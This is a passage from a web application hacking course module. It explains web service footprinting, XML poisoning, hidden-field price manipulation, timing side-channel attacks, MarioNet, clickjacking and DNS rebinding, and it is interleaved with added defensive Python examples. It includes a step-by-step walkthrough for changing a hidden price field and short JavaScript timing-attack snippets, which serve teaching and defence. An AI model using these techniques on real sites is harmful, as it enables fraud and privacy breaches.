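One way to detect the cookie edit shown in the figure, added here as an example and not part of the courseware: the server signs the cookie body with an HMAC and refuses any cookie whose tag no longer matches the body, so a rewritten total price or session ID is treated as no cookie at all. The signing key, payload fields and timestamps are constructed for the illustration; the tamper helper only reproduces the client-side edit so that the check can be exercised. Signing gives integrity, not secrecy: the body is plain base64, which is exactly why the text's remark about Base64 giving a false sense of security still applies to anything confidential.

```python
import base64
import hashlib
import hmac
import json
import time
from typing import Any, Dict, Optional

# Constructed for this example; a real deployment keeps this secret outside the code.
COOKIE_KEY = b"constructed-cookie-signing-key"


def _b64e(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).decode().rstrip("=")


def _b64d(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_cookie(payload: Dict[str, Any], key: bytes = COOKIE_KEY, ttl: int = 3600,
                now: Optional[int] = None) -> str:
    """Serialize the payload with an expiry and append an HMAC-SHA256 tag over the body."""
    body = dict(payload, exp=(now if now is not None else int(time.time())) + ttl)
    encoded = _b64e(json.dumps(body, sort_keys=True, separators=(",", ":")).encode())
    tag = hmac.new(key, encoded.encode(), hashlib.sha256).hexdigest()
    return f"{encoded}.{tag}"


def verify_cookie(cookie: str, key: bytes = COOKIE_KEY,
                  now: Optional[int] = None) -> Optional[Dict[str, Any]]:
    """Return the payload if tag and expiry check out, else None (treat as no cookie)."""
    if "." not in cookie:
        return None
    encoded, tag = cookie.rsplit(".", 1)
    expected = hmac.new(key, encoded.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):   # constant-time compare of the tags
        return None
    try:
        body = json.loads(_b64d(encoded))
    except ValueError:                            # bad base64 or bad JSON
        return None
    current = now if now is not None else int(time.time())
    if not isinstance(body, dict) or body.get("exp", 0) < current:
        return None
    return body


def tamper_with_field(cookie: str, field: str, new_value: Any) -> str:
    """Reproduce the client-side edit from the figure: rewrite one field, keep the old tag."""
    encoded, tag = cookie.rsplit(".", 1)
    body = json.loads(_b64d(encoded))
    body[field] = new_value
    return _b64e(json.dumps(body, sort_keys=True, separators=(",", ":")).encode()) + "." + tag


if __name__ == "__main__":
    issued = sign_cookie({"session": "325896ASD", "TotalPrice": 100})
    print("genuine :", verify_cookie(issued))
    print("tampered:", verify_cookie(tamper_with_field(issued, "TotalPrice", 1)))
```

Keeping the basket and price server-side, keyed by an opaque session ID, removes the incentive to tamper altogether; the signed cookie is the fallback for values that must round-trip through the client.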
Web Service Attack
Similar to the way in which a user interacts with a web application through a browser, a web service can interact directly with the web application without the need for an interactive user session or a browser. The evolution and increasing use of web services in businesses offer new attack vectors in an application framework. Web services are based on XML protocols such as Web Services Definition Language (WSDL) for describing the connection points, Universal Description, Discovery, and Integration (UDDI) for the description and discovery of web services, and Simple Object Access Protocol (SOAP) for communication between web services, which are vulnerable to various web application threats.
These web services have detailed definitions that allow regular users and attackers to understand the construction of the services. Thus, web services provide the attacker with much of the information required to fingerprint the environment to formulate an attack. Some examples of this type of attack are as follows:
1. An attacker injects a malicious script into a web service and can disclose and modify application data.
2. An attacker uses a web service for ordering products and injects a script to reset the quantity and status on the confirmation page to less than what he or she had originally ordered. Thus, the system processing the order request submits the order, ships the order, and then modifies the order to show that the company is shipping a smaller number of products, but the attacker ends up receiving more of the product than he or she pays for.

Figure 14.35: Web services and attacks
Web Service Footprinting Attack
Attackers use the Universal Business Registry (UBR) as a major source to gather information about web services, as it is very useful for both businesses and individuals. It is a public registry that runs on UDDI specifications and SOAP. UBR is somewhat similar to a "Whois server" in functionality. To register web services on a UDDI server, businesses or organizations generally use one of the following structures:
o businessEntity: holds detailed information about the company, such as company name and contact details.
o businessService: a logical group of single or multiple web services. Every businessService structure is a subset of businessEntity. Each businessService outlines the technical and descriptive information about a businessEntity element's web service.
o bindingTemplate: represents a single web service. It is a subset of businessService and it contains technical information that is required by a client application to bind and interact with a target web service.
o technicalModel (tModel): takes the form of keyed metadata and represents unique concepts or constructs in UDDI.
Attackers can footprint a web application to obtain any or all of these UDDI information structures.
XML Query
POST /inquire HTTP/1.1
Content-Type: text/xml; charset
SOAPAction:

Cache-Control: no-cache
Pragma: no-cache
User-Agent: Java/1.4.2_04
Host: uddi.microsoft.com
Accept: text/html, image/gif, image/jpeg, *; q=
Connection: keep-alive
Content-Length: 213

<Envelope xmlns="http://schemas.xmlsoap.org/soap/envelope/">
<Body>
<find_service generic="2.0" xmlns="urn:uddi-org:api_v2"><name>amazon</name></find_service>
</Body>
</Envelope>
HTTP/1.1 100 Continue
XML Response
HTTP/1.1 200 OK
Date: Wed, 08 Jan 2020 11:05:34 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private, max-age=0
Content-Type: text/xml; charset
Content-Length: 1272

<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><serviceList operator="Microsoft Corporation" truncated="false" xmlns="urn:uddi-org:api_v2"><serviceInfos>
<serviceInfo serviceKey="6adé1201-2b7e-Sabe-c5aa-Scc6ab9de#43" businessKey="9112358ad-cl2d-1234-dded-c8e34e8a0aa6"><name xml:lang="en-us">Amazon Research Pane</name></serviceInfo>
<serviceInfo serviceKey="25638942-2d33-52£3-5896-cl2ca5632abe" businessKey="adeSe?3-abed-8£52-ca5e-1253adcefe2a"><name xml:lang="en-us">Amazon Web Services 2.0</name></serviceInfo>
<serviceInfo serviceKey="adtaSc78-deGf-4562-d45c-aad45d4562ad" businessKey="28ddacd8-déSc-456a-4562-acde456740£5"><name xml:lang="en">Amazon.com Web Services</name></serviceInfo>
<serviceInfo serviceKey="ad52a456-4d5£-7dSe-Bdef-cSe6d456ed45" businessKey="45235896-256a-add55a456£12"><name xml:lang="en">AmazonBookPrice</name></serviceInfo>
<serviceInfo serviceKey="9acctSad-ASce-4dSc-1234-888cd4562893" businessKey="aa45238d-cd55-4d22-ed5d-a5Sadc43ad5c"><name xml:lang="en">AmazonBookPrice</name></serviceInfo>
</serviceInfos></serviceList></soap:Body></soap:Envelope>
Web Service XML Poisoning
XML poisoning is similar to an SQL injection attack. It has a higher success rate in a web service framework. Attackers insert malicious XML code in SOAP requests to perform XML node manipulation or XML schema poisoning to generate errors in XML parsing logic and break execution logic. Attackers can manipulate XML external entity references that can lead to arbitrary file or TCP connection openings, which can be exploited for other web service attacks. XML poisoning enables attackers to perform a DoS attack and compromise confidential information. As web services are invoked using XML documents, attackers poison the traffic between the server and browser applications by creating malicious XML documents to alter parsing mechanisms such as SAX and DOM, which web applications use on the server.
XML Request
<CustomerRecord>
<CustomerNumber>2010</CustomerNumber>
<FirstName>Jason</FirstName>
<LastName>springfield</LastName>
<Address>apt 20, 3rd Street</Address>
<Email>jason@springfield.com</Email>
<PhoneNumber>6325896325</PhoneNumber>
</CustomerRecord>
Poisoned XML Request
<CustomerRecord>
<CustomerNumber>2010</CustomerNumber>
<FirstName>Jason</FirstName><CustomerNumber>2010</CustomerNumber>
<FirstName>Jason</FirstName>
<LastName>springfield</LastName>
<Address>apt 20, 3rd Street</Address>
<Email>jason@springfield.com</Email>
<PhoneNumber>6325896325</PhoneNumber>
</CustomerRecord>
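A server-side validator for the CustomerRecord document above, as an added example and not the courseware's code: it refuses any document carrying a DTD before the parser sees it (so no entity expansion and no external entity references are possible), then enforces the record's schema so that the duplicated nodes of the poisoned request are rejected instead of reaching the business logic. The two records are the ones shown above; the DTD sample is constructed for the test and declares only a harmless internal entity.

```python
import re
import xml.etree.ElementTree as ET
from typing import Dict, List, Tuple

# Elements a CustomerRecord must contain exactly once, in the schema the text shows.
REQUIRED_FIELDS = ("CustomerNumber", "FirstName", "LastName", "Address", "Email", "PhoneNumber")

# The clean request from the text.
CLEAN_REQUEST = """<CustomerRecord>
<CustomerNumber>2010</CustomerNumber>
<FirstName>Jason</FirstName>
<LastName>springfield</LastName>
<Address>apt 20, 3rd Street</Address>
<Email>jason@springfield.com</Email>
<PhoneNumber>6325896325</PhoneNumber>
</CustomerRecord>"""

# The poisoned request from the text: CustomerNumber and FirstName appear twice.
POISONED_REQUEST = """<CustomerRecord>
<CustomerNumber>2010</CustomerNumber>
<FirstName>Jason</FirstName><CustomerNumber>2010</CustomerNumber>
<FirstName>Jason</FirstName>
<LastName>springfield</LastName>
<Address>apt 20, 3rd Street</Address>
<Email>jason@springfield.com</Email>
<PhoneNumber>6325896325</PhoneNumber>
</CustomerRecord>"""

# Constructed: a document that declares an entity, which a record never needs.
DTD_REQUEST = """<!DOCTYPE CustomerRecord [<!ENTITY e "x">]>
<CustomerRecord><CustomerNumber>&e;</CustomerNumber></CustomerRecord>"""


def validate_customer_record(xml_text: str) -> Tuple[bool, List[str]]:
    """Schema-check one CustomerRecord before any business logic sees it."""
    # 1. No DTD at all: this closes both entity-expansion DoS and external entities.
    if re.search(r"<!(DOCTYPE|ENTITY)", xml_text, re.IGNORECASE):
        return False, ["DTD or entity declaration present; document refused before parsing"]
    # 2. Well-formedness.
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError as exc:
        return False, [f"malformed XML: {exc}"]
    if root.tag != "CustomerRecord":
        return False, [f"unexpected root element <{root.tag}>"]
    # 3. Structure: each field exactly once, nothing nested, nothing unknown.
    errors: List[str] = []
    counts: Dict[str, int] = {}
    for child in root:
        counts[child.tag] = counts.get(child.tag, 0) + 1
        if len(child):                       # leaf fields must not carry sub-elements
            errors.append(f"<{child.tag}> contains nested elements")
    for tag in REQUIRED_FIELDS:
        n = counts.get(tag, 0)
        if n == 0:
            errors.append(f"missing <{tag}>")
        elif n > 1:
            errors.append(f"duplicate <{tag}> ({n} occurrences)")
    for tag in counts:
        if tag not in REQUIRED_FIELDS:
            errors.append(f"unknown element <{tag}>")
    if errors:
        return False, errors
    # 4. Value formats for the fields that have an obvious shape.
    values = {child.tag: (child.text or "").strip() for child in root}
    if not values["CustomerNumber"].isdigit():
        errors.append("CustomerNumber must be numeric")
    if not re.fullmatch(r"\d{7,15}", values["PhoneNumber"]):
        errors.append("PhoneNumber must be 7-15 digits")
    if not re.fullmatch(r"[^@\s]+@[^@\s]+\.[^@\s]+", values["Email"]):
        errors.append("Email is not well formed")
    return (not errors), errors


if __name__ == "__main__":
    for label, doc in [("clean", CLEAN_REQUEST), ("poisoned", POISONED_REQUEST), ("dtd", DTD_REQUEST)]:
        print(label, validate_customer_record(doc))
```

The structural pass matters as much as the DTD refusal: a DOM parser happily accepts the poisoned record as well-formed XML, and which of the two CustomerNumber values the application ends up using then depends on the parser and the access pattern, which is exactly the ambiguity the attack relies on.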

Hidden Field Manipulation Attack
Attackers carry out hidden field manipulation attacks against e-commerce websites, as most of these sites have hidden fields in their price and discount specifications. In every client session, developers use hidden fields to store client information, including product prices and discount rates. During the development of such programs, developers feel that all their applications are safe; however, hackers can manipulate the product prices and even complete transactions with the altered prices. When a user makes selections on an HTML page, the selection is typically stored as form field values and sent to the application as an HTTP request (GET or POST). HTML can also store field values as hidden fields, which are not rendered on the screen by the browser but collected and submitted as parameters during form submissions. Attackers can examine the HTML code of the page and change the hidden field values to change post requests to the server.
Example
A particular mobile phone might be offered for $1000 on an e-commerce website, but the hacker, by altering some of the hidden text in its price field, purchases it for only $10.
Such attacks result in severe losses for website owners, even though they might be using the latest anti-virus software, firewalls, IDS, and so on to protect their networks from attacks. Besides financial losses, the owners can also lose their market credibility. An example of such code is given below:
<form method="post" action="page.aspx">
<input type="hidden" name="PRICE" value="200.00">
Product name: <input type="text" name="product" value="Certifiedhacker Shirt"><br>
Product price: <input type="text" value="200.00"><br>
<input type="submit" value="Buy">
</form>
1. Open the html page within an HTML editor.
2. Locate the hidden field (e.g., "<type=hidden name=price value=200.00>").
3. Modify its content to a different value (e.g., "<type=hidden name=price value=2.00>").
4. Save the html file locally and browse it.
5. Click the Buy button to perform electronic shoplifting via hidden manipulation.
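The server-side counterpart of the form above, added as an example and not part of the courseware: the checkout prices the order from its own catalog and never from the request, and treats a submitted PRICE field purely as evidence of tampering to be logged. The catalog is constructed for the illustration, using the shirt from the form and the $1000 phone from the example; the submissions are the edits the five steps describe.

```python
from decimal import Decimal, InvalidOperation
from typing import Any, Dict

# Constructed catalog: the only place prices come from.
CATALOG: Dict[str, Decimal] = {
    "Certifiedhacker Shirt": Decimal("200.00"),
    "Mobile Phone": Decimal("1000.00"),
}
MAX_QUANTITY = 100


def process_checkout(form: Dict[str, str]) -> Dict[str, Any]:
    """Price an order from the catalog only; a client-supplied PRICE never reaches the total.

    Returns {"error": ...} for a request that cannot be priced, otherwise the
    priced order plus a flag saying whether the hidden PRICE field disagreed
    with the catalog, which is what an operator wants in the logs.
    """
    product = form.get("product", "")
    if product not in CATALOG:
        return {"error": "unknown product"}
    try:
        quantity = int(form.get("quantity", "1"))
    except ValueError:
        return {"error": "quantity must be an integer"}
    if not 1 <= quantity <= MAX_QUANTITY:
        return {"error": "quantity out of range"}

    unit_price = CATALOG[product]            # authoritative value
    tampered = False
    if "PRICE" in form:                      # hidden field echoed back by the browser
        try:
            tampered = Decimal(form["PRICE"]) != unit_price
        except InvalidOperation:             # not even a number
            tampered = True
    return {
        "product": product,
        "quantity": quantity,
        "unit_price": unit_price,
        "total": unit_price * quantity,
        "price_field_tampered": tampered,
    }


if __name__ == "__main__":
    # Step 3 of the walkthrough: the hidden PRICE rewritten from 200.00 to 2.00.
    print(process_checkout({"product": "Certifiedhacker Shirt", "PRICE": "2.00"}))
    # The $1000 phone "bought" for $10.
    print(process_checkout({"product": "Mobile Phone", "PRICE": "10"}))
```

The cleanest fix is not to emit the price as a hidden field at all; where a value must round-trip (a quoted price that must be honoured for a limited time), sign it server-side rather than trust it back.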
Web-based Timing Attacks
A web-based timing attack is a type of side-channel attack performed by attackers to retrieve sensitive information such as passwords from web applications by measuring the response time taken by the server. These attacks exploit side-channel leakage and estimate the amount of time taken for secret key operations. Different types of web-based timing attacks include direct timing attacks, cross-site timing attacks, and browser-based timing attacks.
Direct Timing Attack
Direct timing attacks are carried out by measuring the approximate time taken by the server to process a POST request, through which attackers can deduce the existence of a username. Similarly, attackers perform character by character password examination and exploit the timing information to determine the position where the password comparison failed. Then, attackers use this data to determine the target user's password.
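What the direct timing attack measures, and the two server-side fixes, as an added example and not the courseware's code: an early-exit string comparison whose work grows with the length of the matching prefix (here the work is counted deterministically instead of timed), a constant-time comparison over fixed-length digests, and a login routine that performs identical work for unknown users so that neither the username-existence nor the failing-position signal exists. The user record, salt and password are constructed for the illustration.

```python
import hashlib
import hmac
import os
from typing import Dict, Tuple


def naive_compare(secret: str, guess: str) -> Tuple[bool, int]:
    """Early-exit comparison: returns (match, characters examined).

    The second value is the side channel: a guess that fails at position 6
    costs six comparisons, one that fails at position 1 costs one, and a
    remote attacker sees that difference as response time.
    """
    steps = 0
    if len(secret) != len(guess):
        return False, steps
    for a, b in zip(secret, guess):
        steps += 1
        if a != b:
            return False, steps
    return True, steps


def constant_time_compare(secret: str, guess: str) -> bool:
    """Compare fixed-length digests with hmac.compare_digest: every byte is
    examined regardless of where the first difference is, and hashing first
    hides the length of the secret as well."""
    return hmac.compare_digest(hashlib.sha256(secret.encode()).digest(),
                               hashlib.sha256(guess.encode()).digest())


def _hash(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 50_000)


# Constructed user store: salted PBKDF2 hashes, never plaintext.
_SALT_ALICE = b"constructed-salt-0001"
USERS: Dict[str, Tuple[bytes, bytes]] = {
    "alice": (_SALT_ALICE, _hash("correct horse battery staple", _SALT_ALICE)),
}
# A dummy record used for unknown usernames so the work done is the same either way.
_DUMMY_SALT = os.urandom(16)
_DUMMY_HASH = _hash("dummy", _DUMMY_SALT)


def verify_login(username: str, password: str) -> bool:
    """Same hashing cost and a constant-time compare whether or not the user exists."""
    salt, stored = USERS.get(username, (_DUMMY_SALT, _DUMMY_HASH))
    computed = _hash(password, salt)
    digest_ok = hmac.compare_digest(computed, stored)
    known = username in USERS
    return digest_ok and known


if __name__ == "__main__":
    for guess in ("x3cret", "s3cret", "s3crex"):
        print(guess, naive_compare("s3cret", guess), constant_time_compare("s3cret", guess))
    print(verify_login("alice", "correct horse battery staple"), verify_login("bob", "anything"))
```

For the cross-site and browser-based variants discussed next, the server-side fix is different: marking session cookies SameSite so that a request made from the attacker's page carries no credentials removes the authenticated-versus-error difference those measurements depend on.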
Cross-site Timing Attack
A cross-site timing attack is another type of timing attack, in which attackers send crafted request packets to the website using JavaScript, unlike a direct timing attack, where the attacker himself/herself passes the request to a website. The attacker then analyzes the time consumed by the user to download the requested file. For instance, consider a website http://xyz.com that contains two separate groups such as /the-prompt/ and /the-anonymous-place/, and only the group members have access to the data fed into these groups. If any other person tries to access the group, an error message is generated. Now, when a user accesses an unknown website that contains malicious JavaScript injected by the attacker, the attacker can find out which group the user belongs to and thus violate his/her privacy.

Sample JavaScript code used to perform this attack:
function getMeasurement(url, callback) {
    var a = new Image();
    a.addEventListener('error', function() {
        // the error event fires once the cross-origin load has finished (or been refused)
        var conclude = performance.now();
        callback(conclude - begin);
    });
    var begin = performance.now();
    a.src = url;
}
getMeasurement('http://xyz.com/the-prompt/', function(timeTDs) {
    getMeasurement('http://xyz.com/the-anonymous-place', function(timeTF) {
        if (timeTF > timeTDs) {
            alert('The prompt is alright!');
        } else {
            alert('Privacy breach!');
        }
    });
});
Browser-based Timing Attacks
Browser-based timing attacks are sophisticated side-channel attacks. Rather than depending on the unsteady download time, attackers take advantage of side-channel leaks of a browser to estimate the time taken by the browser to process the requested resources. In this case, the time estimation begins immediately after the download of a resource and ceases once the processing is done. Attackers can abuse different browser functionalities to launch further attacks such as video parsing attack and cache storage timing attack.
o Video-parsing Attack
Sample JavaScript code used to perform this attack:
function getMeasurement(url, callback) {
    var p = document.createElement('video');
    var begin;
    p.addEventListener('suspend', function() {
        // download finished or stopped: the clock starts here, not at the request
        begin = performance.now();
    });
    p.addEventListener('error', function() {
        // the browser failed to parse the resource as video: the clock stops
        var conclude = performance.now();
        callback(conclude - begin);
    });
    p.src = url;
}
In contrast to cross-site timing attacks, here, the estimation time begins when the event "suspend" is triggered. The event is usually triggered when the resource downloading is stopped, as the requested resource is not an intended video; it is only a double- or triple-digit KB file. The event is also triggered when the resource download is completed. Subsequently, the browser attempts to parse the requested resource as a video. Certainly, the HTML/JSON/... files are invalid video formats; hence, the browser will raise an "error" event. Here, the attacker observes the amount of time the browser takes to process the resource and generate an error event. Single estimation for every end point might not always serve the purpose. Therefore, attackers try to accumulate several time estimations and calculate the median or average.
o Cache Storage Timing Attack
The Cache API interface (used to load, fetch, and delete any responses) offers complete cache (memory) to the developers. Loading resources in the disk takes some amount of time based on the resource size. If attackers can estimate the time taken by the browser to perform this task, they can measure the corresponding response size.

Sample JavaScript code used to perform this attack:
function getMeasurement(url, callback) {
    fetch(url, {mode: "no-cors", credentials: "include"}).then(function(resp) {
        setTimeout(function() {
            var begin = performance.now();
            caches.open('attackerfile').then(function(cache) {
                // time how long the Cache API takes to store the opaque response
                cache.put(new Request('myfoo'), resp.clone()).then(function() {
                    var conclude = performance.now();
                    callback(conclude - begin);
                });
            });
        }, 2000);
    });
}
After estimating or measuring the processing time using the abovementioned techniques, attackers can launch further attacks such as brute-force attacks to obtain complete information.
MarioNet Attack
MarioNet is a browser-based attack that runs malicious code inside the browser, and the infection persists even after closing or browsing away from the malicious webpage through which the infection has spread. Most of the latest web browsers support a new API called Service Workers that allows the website to isolate operations that render the webpage UI from intensive computational tasks to avoid freezing of the UI when large amounts of data are processed. Attackers register and activate the Service Workers API through a website controlled by them. When the victim browses that website, the Service Workers API automatically activates, and it can run persistently in the background even when the user is not actively browsing the website. To keep the Service Workers API alive, attackers abuse the Service Workers SyncManager interface. Therefore, MarioNet can resist any tab crashes and power failures, increasing the attacker's potential to attack the browser. MarioNet leverages the abilities of JavaScript and depends on previously available HTML5 APIs. It can be used to create a botnet and launch other malicious attacks such as cryptojacking, DDoS, click fraud, and distributed password cracking. Furthermore, this attack allows attackers to inject malicious code into high-traffic websites for a short period, retrieve sensitive information such as user credentials, and then control the abused browsers from a central server.
Figure 14.36: Illustration of MarioNet attack (web browser with blocking extensions, web server, service worker, remote C&C)
Attack
Clickjacking
A clickjacking attack is performed when the target website is loaded into an iframe element that is masked with a web page element that appears legitimate. The attacker performs this attack by tricking the victim into clicking on any malicious web page element that is placed transparently on top of any trusted web page. Clickjacking is not a single technique; attackers leverage various attack vectors and techniques called UI redress attacks. They perform such attacks by exploiting the vulnerabilities caused by HTML iframes or improper configuration of the X-Frame-Options header. There are several variations of clickjacking attacks, such as likejacking and cursorjacking. To perform these attacks, attackers send a link to the malicious website to the victim through email, social media, or any other media.
In clickjacking, the attacker loads the target website inside a low opacity iframe. Then, the attacker designs a page such that all the clickable items such as buttons are positioned exactly as on the selected target website. Now, the victim is tricked into clicking on the invisible controls or the deceptive UI elements that automatically trigger various malicious actions such as injecting malware, retrieving malicious web pages, retrieving sensitive information such as credit card details, transferring money from the victim's account, and buying products online.
The various clickjacking techniques employed by attackers are listed below:
- Complete transparent overlay: In this technique, the transparent, legitimate page or tool page is overlaid on the previously designed malicious page. Then, it is loaded into an invisible iframe and the higher z-index value is assigned for positioning it on top.
- Cropping: In this technique, only the selected controls from the transparent page are overlaid. This technique depends on the goal of the attack and may involve masking buttons with hyperlinks and text labels with false information, changing the button labels with wrong commands, and completely covering the legitimate page with misleading information while exposing only one original button.
- Hidden overlay: In this technique, the attacker creates an iframe of 1x1 pixels containing malicious content placed secretly under the mouse cursor. When the user clicks on this cursor, it will be registered on the malicious page although the malicious content is concealed by the cursor.
- Click event dropping: This technique can completely hide a malicious page behind a legitimate page. It can also be used to set the CSS pointer-events property of the top legitimate page to none. This can cause click events to "drop" through the masked page and register only on the malicious page.

- Rapid content replacement: In this technique, the targeted controls are covered by opaque overlays that are removed only for a moment for registering a click. An attacker using this technique needs to accurately predict the time taken by the victim to click on the web page.

Figure 14.37: Illustration of clickjacking attack
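The defence against every iframe-overlay variant above is a response header that forbids framing. The checker below, an added example rather than CEH material, classifies a response's X-Frame-Options and Content-Security-Policy frame-ancestors headers the way browsers combine them, including the misconfigurations the text alludes to; the header sets at the bottom are constructed.

```python
"""Classify the framing policy expressed by HTTP response headers.
Added example (not from the CEH text); sample headers are constructed."""
from typing import Dict, List, Optional


def csp_frame_ancestors(csp: str) -> Optional[List[str]]:
    """Source list of the frame-ancestors directive, or None if absent."""
    for directive in csp.split(";"):
        tokens = directive.strip().split()
        if tokens and tokens[0].lower() == "frame-ancestors":
            return [t.lower() for t in tokens[1:]]
    return None


def framing_protection(headers: Dict[str, str]) -> Dict[str, object]:
    """Return {"protected": bool, "policy": str, "notes": [...]}.

    Header names are matched case-insensitively. When both headers are
    present, CSP frame-ancestors wins in browsers that support it, so an
    over-permissive frame-ancestors cancels a strict X-Frame-Options.
    """
    h = {name.lower(): value.strip() for name, value in headers.items()}
    notes: List[str] = []
    protected, policy = False, "none"

    ancestors = csp_frame_ancestors(h.get("content-security-policy", ""))
    if ancestors is not None:
        if not ancestors or ancestors == ["'none'"]:
            protected, policy = True, "csp:none"
        elif ancestors == ["'self'"]:
            protected, policy = True, "csp:self"
        elif any(a in ("*", "http:", "https:") for a in ancestors):
            policy = "csp:any"
            notes.append("frame-ancestors permits any origin; framing is not restricted")
        else:
            protected, policy = True, "csp:allowlist"

    xfo = h.get("x-frame-options", "").upper()
    if xfo in ("DENY", "SAMEORIGIN"):
        if ancestors is None:
            protected, policy = True, "xfo:" + xfo.lower()
    elif xfo.startswith("ALLOW-FROM"):
        notes.append("X-Frame-Options ALLOW-FROM is obsolete; modern browsers ignore it")
        if ancestors is None:
            policy = "xfo:allow-from"
    elif xfo:
        # e.g. ALLOWALL, or two values joined by a comma: browsers ignore these
        notes.append(f"unrecognised X-Frame-Options value {xfo!r}; browsers ignore it")
        if ancestors is None:
            policy = "xfo:invalid"
    elif ancestors is None:
        notes.append("neither X-Frame-Options nor frame-ancestors is set")

    if ancestors is not None and not xfo:
        notes.append("add X-Frame-Options for browsers without CSP level 2 support")
    return {"protected": protected, "policy": policy, "notes": notes}


if __name__ == "__main__":
    # Constructed header sets: a hardened response and two weak ones.
    for sample in (
        {"X-Frame-Options": "DENY"},
        {"Content-Security-Policy": "frame-ancestors *", "X-Frame-Options": "DENY"},
        {"X-Frame-Options": "ALLOW-FROM https://partner.example"},
    ):
        print(sample, "->", framing_protection(sample))
```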
DNS Rebinding Attack
Attackers use the DNS rebinding technique to bypass the same-origin policy's security constraints, allowing the malicious web page to communicate with or make arbitrary requests to local domains. For instance, if a client is working for an organization, he/she mostly uses the internal or private network. Any external resources cannot be accessed inside that private network due to the same-origin policy (SOP). Hence, attackers cannot directly communicate with the local network due to restrictions in the SOP. Therefore, they use the DNS rebinding technique to circumvent this SOP security implementation.
How DNS Rebinding Works
An attacker creates a malicious website with the domain name certifiedhacker.com and registers it with the DNS server controlled by him/her. Now, the attacker configures the DNS server to send DNS responses with very short TTL values to avoid caching of the responses. Then, the attacker begins his/her intended operation with the HTTP server that contains the malicious website http://certifiedhacker.com. When the victim opens the malicious website, the attacker's DNS server sends the IP address of the HTTP server that hosts the attacker-controlled website http://certifiedhacker.com. The web server responds with a page that runs JavaScript code in the victim's browser. Then, the JavaScript code accesses the website on the domain http://certifiedhacker.com to get additional resources from http://certifiedhacker.com/secret.html. When the browser runs the JavaScript, it makes a DNS request for the domain (owing to the short TTL configuration), but the attacker-controlled DNS server responds with a new IP. For instance, if the attacker-controlled DNS server responds with the private or internal IP of xyz.com, the victim's browser loads http://xyz.com/secret.html and not http://certifiedhacker.com/secret.html, successfully bypassing the SOP.
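Two controls break the sequence just described at different points: a resolver that refuses answers mapping an external name to internal address space (the "new IP"), and an internal service that validates the Host header so a request arriving under certifiedhacker.com is rejected. The script below is an added example, not from the CEH text; the answer sequence, the internal zone xyz.com, and the addresses are constructed.

```python
"""Defender-side DNS rebinding checks. Added example (not CEH material);
hostnames, addresses and the TTL threshold are constructed assumptions."""
import ipaddress
from typing import Iterable, List, Tuple

# Address space that an external name should never resolve to.
PRIVATE_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
    "169.254.0.0/16", "0.0.0.0/8", "::1/128", "fc00::/7", "fe80::/10",
)]
REBIND_TTL_SECONDS = 60   # assumption: answers at or below this are "very short"


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in PRIVATE_NETS)


def classify_answer(name: str, ip: str, ttl: int,
                    internal_zones: Iterable[str]) -> Tuple[bool, str]:
    """Return (allowed, reason) for one A/AAAA answer seen by the resolver.

    Names inside the organisation's own zones may resolve to internal space;
    any other name resolving there is the rebinding step and is refused.
    A very short TTL on an external name is reported but not blocked alone.
    """
    in_own_zone = any(name == z or name.endswith("." + z) for z in internal_zones)
    if is_internal(ip) and not in_own_zone:
        return False, f"{name} -> {ip}: external name resolved to internal address (rebinding)"
    if ttl <= REBIND_TTL_SECONDS and not in_own_zone:
        return True, f"{name} -> {ip}: allowed, but TTL {ttl}s is unusually short"
    return True, f"{name} -> {ip}: allowed"


def host_header_ok(host_header: str, allowed_hosts: Iterable[str]) -> bool:
    """Server-side check: accept only the Host values the service is deployed under.
    A rebound request still carries the attacker's domain in Host."""
    host = host_header.split(":", 1)[0].strip().lower()  # drop any :port
    return host in {h.lower() for h in allowed_hosts}


def simulate_rebinding(answers: List[Tuple[str, str, int]],
                       internal_zones: Iterable[str]) -> List[Tuple[bool, str]]:
    """Run the resolver filter over an observed sequence of answers."""
    zones = list(internal_zones)
    return [classify_answer(n, ip, ttl, zones) for n, ip, ttl in answers]


if __name__ == "__main__":
    # Constructed sequence mirroring the text: first answer is the attacker's
    # public server, the second (after the short TTL expires) is an internal IP.
    observed = [
        ("certifiedhacker.com", "203.0.113.10", 5),
        ("certifiedhacker.com", "10.0.0.25", 5),
    ]
    for ok, why in simulate_rebinding(observed, ["xyz.com"]):
        print("ALLOW" if ok else "BLOCK", why)
    print(host_header_ok("certifiedhacker.com", ["intranet.xyz.com"]))  # False
```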

Module Flow

Web Application Hacking Methodology
The previous section discussed the security posture of web applications by analyzing various types of threats/attacks currently in use. Attackers perform these attacks using a detailed process called the hacking methodology. This section will describe the steps of the hacking methodology, explaining how attackers target web applications.

Attackers use the web application hacking methodology to gain knowledge of a particular web application to compromise it successfully. This methodology allows them to plan each step in detail to increase their chances of successfully hacking the application. Under this methodology, they do the following to collect detailed information about various resources needed to run or access the web application:
- Footprint web infrastructure
- Analyze web applications
- Bypass client-side controls
- Attack authentication mechanisms
- Attack authorization schemes
- Attack access controls
- Attack session management mechanisms
- Perform injection attacks
- Attack application logic flaws
- Attack shared environments
- Attack database connectivity
- Attack web application clients
- Attack web services
If hackers do not use this process and try to exploit the web application directly, their chances of failure increase. The following phases of this module will provide a detailed explanation of how attackers derive information about these resources.

Footprint Web Infrastructure
Footprinting is the process of gathering complete information about a system and all its related components, as well as how they work. The web infrastructure of a web application is the arrangement by which it connects to other systems, servers, and so on in the network. Web infrastructure footprinting is the first step in web application hacking; it helps attackers to select victims and identify vulnerable web applications. Attackers footprint the web infrastructure to know how the web application connects with its peers and the technologies it uses and to find vulnerabilities in specific parts of the web application architecture. These vulnerabilities can help attackers to exploit and gain unauthorized access to the web application. Footprinting the web infrastructure allows an attacker to engage in the following tasks:
- Server Discovery: Attackers attempt to discover the physical servers that host web applications, using techniques such as Whois lookup, DNS interrogation, port scanning, and so on.
